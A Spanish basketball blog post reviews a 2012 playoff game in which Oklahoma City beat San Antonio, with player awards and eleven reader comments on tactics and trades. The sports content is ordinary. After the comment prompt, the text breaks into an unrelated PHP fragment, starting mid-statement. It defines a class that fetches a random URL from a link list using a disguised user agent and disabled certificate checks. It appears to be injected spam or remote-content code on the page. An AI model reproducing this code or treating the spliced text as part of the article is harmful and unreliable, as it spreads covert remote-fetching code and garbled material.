La Crónica: Aspas de molino

01 de June de 2012 por TheDeerHunter

Se acabó la imbatibilidad de los Spurs. En justicia tenía que ocurrir contra un rival tan potente como son los Thunder, en una cancha tan difícil como es aquella.

No funcionó ayer el escandaloso juego de pases que venían desplegando. Andaban algo más espesos que de costumbre y los Thunder, llevados en volandas por su público, estuvieron especialmente brillantes en términos defensivos. Nada menos que 14 robos (para 21 pérdidas de SA) y 9 tapones. Los Spurs se quedaron por primera vez por debajo del 40% en tiro, con varios elementos desconectados. Sólo el acierto en los triples y los minutos de la basura les libró de una paliza mayor (82-102).

Esto son los playoffs y cada partido es un mundo. Un día prevalece el imaginativo ataque de unos y al siguiente la potencia e intensidad de los otros. Nos maravillan ambos modelos. Disfrutamos tanto con las 1000 variantes al pick&roll que puede generar Parker como del juego directo de Durant lanzado como un misil.

Fascina la evolución individual de todos ellos. Si estábamos convencidos de la superioridad colectiva de San Antonio ayer fue al revés. Ayer destacó Sefolosha en una actuación estelar y también Ibaka. Rindieron bien Perkins, Fisher y Collison mientras que en el rival únicamente funcionó Jackson y un poco Blair en los minutos de la basura. Decepcionaron anoche casi todos.

Tampoco estuvo bien la tríada Parker-Manu-Duncan mientras que Durant-Westbrook-Harden aprovecharon la cresta de la ola de los suyos. Duncan, por cierto, ha pasado a Jabbar como máximo taponador absoluto en playoffs de todos los tiempos.

PREMIOS

MVP: Y sorpresa todo en uno. En el último partido demandábamos una mayor implicación de los secundarios de los Thunder y parece que Thabo Sefolosha se dio por aludido. 19 puntos, 6 rebotes y 6 robos para el suizo, en su mejor partido de playoffs.

Decepción: Los Spurs naufragaron prácticamente al completo en el Chesapeake Energy Arena. Mención especial para los 8 puntos de Manu Ginobili, los 11 de Tim Duncan y los solitarios puntos de Tiago Splitter y Boris Diaw.

Esfuerzo en vano: Stephen Jackson estuvo sembrado en el tiro (6 de 7) y anotó 16 puntos. De todas maneras no destacó mucho más que el resto de sus compañeros.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Y al fin se acabó al racha. Era de esperar que los Spurs no pudieran mantener su impresionante racha de triunfos ya que barrer a un equipo tan bueno como los Thunder no era de esperar. Esta vez no sólo perdieron sino que fueron sacados de la pista por unos impresionantes Thunder.
    Creo que la clave ha estado en el cambio defensivo de los Thunder. Si en los dos primeros partidos los Spurs habían hecho lo que habían querido a partir del pick&roll y pasado los 100 puntos esta vez los Thunder estuvieron mucho más agresivos en la pista y Sefolosha jugó un partido impresionante en defensa y ataque limitándo muchísimo a Parker, robando, taponando, estorbando y luego metiendo triples en ataque. Además fue clave en esta mejor defensa dos puntos en los que fallaron los Spurs:
    1) Ante la defensa del pick&roll super agresiva sobremarcando a Parker y Manudo, Duncan se quedó varias veces sólo y no estuvo acertado en sus lanzamientos de media distancia.
    2) El propio Duncan no pudo hacer daño en el poste y los Thunder cerraron los puntos en la zona de los Spurs, obligando a los Spurs a tirar muchos triples y aunque metieron bastantes esto abrió el campo para el contraataque de los de OKC.
    Con su defensa carburando, los Thunder cogieron confianza para el ataque consiguiendo buenas transiciones y además consiguieron involucrar en su ataque a bastantes más jugadores fuera de sus 3 grandes espadas Durant, Westbrook, Harden. Movieron mejor el balón y los secundarios estuvieron bastante acertados (Sefolosha 19 puntos, Ibaka 14, Collison 6, Fisher 5).
    Clave también que Brooks parece que se ha decidido por la opción que se vió que podía resultar el otro día, es decir, menos minutos para Perkins y muchos minutos con Durant de 4 usando gente con más movilidad como Ibaka y Collison de 5. Esto permitió a los Thunder ser mucho más agresivos en defensa dificultando las líneas de pase de los de San Antonio e impidiendo ese juego fluido que ha caracterizado a los Spurs en la increíble racha de victorias que llevaban. Muchos robos que pusieron a los Thunder en campo abierto donde son imparables.
    También llamativo el hecho de que Popovich quitó muy rápido a sus titulares asumiendo la derrota desde muy pronto. Es algo que suele hacer de cuando en cuando para dar un toque y reservar fuerzas de sus veteranos.
    Ahora se abre de nuevo la eliminatoria y deja un interesantísimo 4º partido. ¿Seguirán apostando los Thunder por el juego con Durant de 4? ¿Como tratará Popovich de contrarrestarlo? ¿Será capaz Duncan de sacar de nuevo ventajas interiores? ¿Podrán los Thunder seguir tan agresivos y dificultar el ataque spur para salir a la carrera al contraataque? Interesantísimo el partido del sábado. Los Thunder han entrado de nuevo en la eliminatoria pero tienen que ganar sí o sí el 4º para tener alguna opción de pasar. Seguro que en el partido del sábado no les va a ser tan fácil sacar a los Spurs de su juego.

      Citar

  2. Nacho dice:
    #2

    Tanto anoche, como anteanoche, vimos a los grandes BigThree de la liga ser menos BigThree y ser más equipo. Y eso les llevó a la victoria. Sobre todo en el caso de Miami. Quizás aprendan el camino.
    En el caso de OKC me sigue decepcionando Westbrook. Aunque realmente debo decir que esa esperanza que vi contra Lakers se ha esfumado. Sigue siendo un magnífico anotador, pero que no sabe leer los partidos, y no quiere darse cuenta de que tiene compañeros a su lado, y además mejores. Cada vez veo más claro que el camino de los Thunder para ser grandes pasa por otro base y mantener a Hardem y a Durant como dupla ofensiva importante, más el apoyo de Ibaka. Viendo que no pueden mantener a los cuatro y que a Russell lo doy por perdido para la causa, sería bueno para ambos el cambio. OKC sería verdadero candidato al anillo y quizás ¿Kings, Sancho? Westbrook desboca todo su caudal sin la responsabilidad de la victoria sí o sí.

      Citar

  3. nba dice:
    #3

    Como dicen en mi pueblo Westbrook, no anda muy sobrado de baloncesto IQ, eso no quita para que sea una bestia.
    Que lastima que solo pueda llegar un equipo del Oeste a la final …, o se da prisa Lebron en ganar su anillo

      Citar

  4. nba dice:
    #4

    O estos Thunder se lo van a poner muy negro en año venideros

      Citar

  5. Sancho88 dice:
    #5

    Imposible descargarse un partido en condiciones oye… solo se ve bien el primer cuarto y los demás enlaces son auténticas bazofias o directamente no funcionan. Plis, alguien que tenga una página de confianza que no sea rojadirecta?

    Y tema pick&roll de Spurs y 2×1 sobre Parker. Donde sacó ventaja Spurs en el primer partido y en los tres primeros cuartos del segundo, hasta que pasaron del +22 al +6 fue a través de bloqueos en el poste alto, que no quiere decir que fuera directamente todo el rato con bloqueo y continuación, ya que muchas veces el balón no continuó a canasta, por no decir la mayoría. No es esa la especialidad de Parker. Entonces, en esos bloqueos sí sacaron ventajas los Spurs, con bloqueos arriba sobre Parker pero este penetrando o doblando fuera in and out o lanzando solo porque su marca se había quedado encerrado en el bloqueo y la ayuda no había cambiado, por lo cual Parker estaba totalmente solo. Lo que yo explicaba el otro día y nadie estuvo de acuerdo fue que los Thunder habían aprendido a defender a Parker, y lo baso en el 2×1 muy agresivo sin cambiar en el miss match con Duncan, sino yéndose los dos a por Parker y pasando su marca muy bien el bloqueo; ahí se le echan encima literalmente y no puede sacar la bola. Eso le pasó en la casi remontada del otro día, donde, desesperado, solo podía jugar pick&pop con Duncan que no está jugando a su nivel y no le entraban los tiros, o buscarlo en la continuación bien defendido por Ibaka, que no le dejaba llegar a sus tres metritos reglamentarios para postear, que es donde mejor se desenvuelve.

    Por tanto, estoy totalmente seguro de que Spurs ya no sacan ventaja del pick and roll, que el 2×1 cuando se han puesto fuertes los Thunder ha sido una maravilla, y que Ibaka tiene que marcar a Duncan como sea, y no Perkins.

      Citar

  6. Sancho88 dice:
    #6

    Dicho esto, la eliminatoria está en su salsa, al dente. Era descabellado esperar un paseo militar de los Spurs y las cosas están en su sitio. Ojalá empaten los Thunder y podamos ver una mini serie a tres partidos con un séptimo incluido. Si empatan el sábado, Spurs tendrá que cambiar totalmente de guión. Poner a Parker y Ginobili juntos puede ser una solución, o jugar dos postes arriba con Duncan y Blair, que por cuerpo puede poner muy buenos bloqueos. La cosa debe ser sorprender continuamente, porque en el estático son muy superiores y creo que con Duncan dentro, maniobrando dentro-fuera-dentro continuamente, no es suficiente. El esquema con tres hombres abiertos, Duncan por dentro y Parker creando se ha quedado obsoleto. Es un poco lo que les pasó a los Pacers, aunque en este caso Spurs tienen muchos más recursos para salir del bache. Ya digo, creo que se equivocan jugando con cuatro tipos abiertos. Son amenazas exteriores, pero Thunder controlará entonces la línea de pase para robar 14 o más balones como anoche, y eso acaba siendo contraproducente. Siempre he creído que el juego abierto debe ser un recurso para abrir defensas cerradas, no un sistema central sin anteponer antes el juego con los dos postes.

    Blair in, Diaw out. Blair fijando a Ibaka y Duncan jugando sistemas con Parker. Así podrán cargar mejor el rebote ofensivo y pueden seguir abriendo fuera. Si es el tema, que Parker no necesita tener a otros tres tíos en el perímetro para elegir una gran opción. Él es muy bueno pasando bloqueo y penetrando, sacando la bola fuear o continuando, y necesita poquitas cosas para demostrarlo. Popo debe poner más trampas y desplegar su arsenal de jugadas. Thunder no pueden aguantar esa riqueza táctica y acabarán sucumbiendo, pero Popo se tiene que dar cuenta a tiempo porque si no, quizá Thunder empiecen a tirar de fuerza, físico y defensa, y den la vuelta a la serie. Tienen más talento individual concentrado y ese juego rápido les ayuda a desarrollarlo.

    Spurs no ganarán la serie si olvidan el bloque y olvidan toda su riqueza táctica que pueden desplegar

      Citar

  7. Sancho88 dice:
    #7

    Nacho:
    Tanto anoche, como anteanoche, vimos a los grandes BigThree de la liga ser menos BigThree y ser más equipo. Y eso les llevó a la victoria. Sobre todo en el caso de Miami. Quizás aprendan el camino.
    En el caso de OKC me sigue decepcionando Westbrook. Aunque realmente debo decir que esa esperanza que vi contra Lakers se ha esfumado. Sigue siendo un magnífico anotador, pero que no sabe leer los partidos, y no quiere darse cuenta de que tiene compañeros a su lado, y además mejores. Cada vez veo más claro que el camino de los Thunder para ser grandes pasa por otro base y mantener a Hardem y a Durant como dupla ofensiva importante, más el apoyo de Ibaka. Viendo que no pueden mantener a los cuatro y que a Russell lo doy por perdido para la causa, sería bueno para ambos el cambio. OKC sería verdadero candidato al anillo y quizás ¿Kings, Sancho? Westbrook desboca todo su caudal sin la responsabilidad de la victoria sí o sí.

    Dices que Thunder necesitan un base, pero cómo lo van a cambiar con los Kings?? Eso es imposible, a no ser que te refieras al trueque con Tyreke Evans… ufff, no sé, no le veo para un equipazo como este y no veo las ventajas ni para unos ni para otros, aunque puede ser que Evans creciera mucho al lado de Durant… No sé, creo que deben ponerle un señor reflexivo que le dé buenos pases, no un proyecto de estrella o un base anotador. Es lo que necesita Durant.

    A mi juicio, lo que necesitan como el comer estos chavales es quitarse de enmedio a Perkins, pero si no pueden mantener el salario de su big four (veremos cuánto pide Ibaka para renovar), puede ser una buena idea por ejemplo buscar a alguien como Nash, que no pedirá mucho y querrá subirse al carro del anillo, y cambiar a Westbrook por Monroe+Stuckey, por ejemplo. Ya digo, no sé la pasta que están dispuestos a poner los propietarios para mantener esta joyaza de equipo que puede ganar tranquilamente 5 anillos durante la próxima década, pero deberían ponerlo todo sobre la mesa porque los trenes solo pasan una vez en la vida. Si empiezan a racanear con los salarios y demás, que se olviden de hacer historia.

    Por otra parte, no creo que a los Kings les vendría bien tener a Westbrook…juntarlo con Thornton podría ser un suicidio. Realmente, no cuadra en ningún equipo, ni siquiera en los Kings… como no espabile en el conocimiento de juego no creo que le quieran nunca equipos con aspiraciones a anillo, y símplemente será un Deron Williams de la vida.

    El único cambio posible que veo sería Westbrook x Tyreke+Thornton… hmmm… no suena tan mal la verdad. Westbrook-Cousins serían pareja fija en playoffs, con Thomas dirigiendo la orquesta +lo que pueda venir en el draft. Yo renovaría a Thompson e intentaría draftear a un alero de los grandes que se van a presentar en las primeras elecciones

      Citar

  8. nba dice:
    #8

    A los Thunder, os cambiamos a Pau+Goudelock+Barnes por WestBrook+Perkins, ya que sino no vais a poder renovar a Harden e Ibaka , por toda la pasta que se merecen

      Citar

  9. melo15 dice:
    #9

    Acaba el cuarto en el TD Garden, y de momento los dos equipos con tacticas similares, los Celtics estan volcando balones a Garnett, que se esta comiendo a todos los interiores de Miami, y por parte del equipo visitante, balones a Lebron que esta espectacular, anotando desde medias distancia, 3 puntos, penetrando…
    Tambien esta aportando bastante Dooling.

      Citar

  10. rumbero dice:
    #10

    Garnett cascandose 10 flexiones con los puños cerrados despues de que le metan un palo que le deja en el suelo. Tremendo xD
    Hoy, por fin, bien los suplentes de los Celtics sobretodo en defensa. Aportando asi si pueden tener opciones, con Pierce y Garnett haciendo daño.
    A Lebron va a tener que echarle una mano Wade que hasta el momento esta desaparecido en combate

      Citar

  11. Nacho dice:
    #11

    Sancho88: Dices que Thunder necesitan un base, pero cómo lo van a cambiar con los Kings?? Eso es imposible, a no ser que te refieras al trueque con Tyreke Evans… ufff, no sé, no le veo para un equipazo como este y no veo las ventajas ni para unos ni para otros, aunque puede ser que Evans creciera mucho al lado de Durant… No sé, creo que deben ponerle un señor reflexivo que le dé buenos pases, no un proyecto de estrella o un base anotador. Es lo que necesita Durant.

    A mi juicio, lo que necesitan como el comer estos chavales es quitarse de enmedio a Perkins, pero si no pueden mantener el salario de su big four (veremos cuánto pide Ibaka para renovar), puede ser una buena idea por ejemplo buscar a alguien como Nash, que no pedirá mucho y querrá subirse al carro del anillo, y cambiar a Westbrook por Monroe+Stuckey, por ejemplo. Ya digo, no sé la pasta que están dispuestos a poner los propietarios para mantener esta joyaza de equipo que puede ganar tranquilamente 5 anillos durante la próxima década, pero deberían ponerlo todo sobre la mesa porque los trenes solo pasan una vez en la vida. Si empiezan a racanear con los salarios y demás, que se olviden de hacer historia.

    Por otra parte, no creo que a los Kings les vendría bien tener a Westbrook…juntarlo con Thornton podría ser un suicidio. Realmente, no cuadra en ningún equipo, ni siquiera en los Kings… como no espabile en el conocimiento de juego no creo que le quieran nunca equipos con aspiraciones a anillo, y símplemente será un Deron Williams de la vida.

    El único cambio posible que veo sería Westbrook x Tyreke+Thornton… hmmm… no suena tan mal la verdad. Westbrook-Cousins serían pareja fija en playoffs, con Thomas dirigiendo la orquesta +lo que pueda venir en el draft. Yo renovaría a Thompson e intentaría draftear a un alero de los grandes que se van a presentar en las primeras elecciones

    Lo decía porque podía ser buen jugador para Kings, obviamente el cambio no debería ir por ahí. Pero creo que estos Thunder para ser equipo de leyenda necesitan otro base.

    nba:
    A los Thunder, os cambiamos a Pau+Goudelock+Barnes por WestBrook+Perkins, ya que sino no vais a poder renovar a Harden e Ibaka , por toda la pasta que se merecen

    Haces infinitamente mejor equipo a OKC, pero aun deberían buscar un base. Joder! es que les pones a un tipo como Pau jugando de 5 que atrae a defensas y Durant y Harden se hincharían aun más. Pero de pasta andarían igual de chungos. Además molarían las broncas en cada ataque de Kobe a Westbrook.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>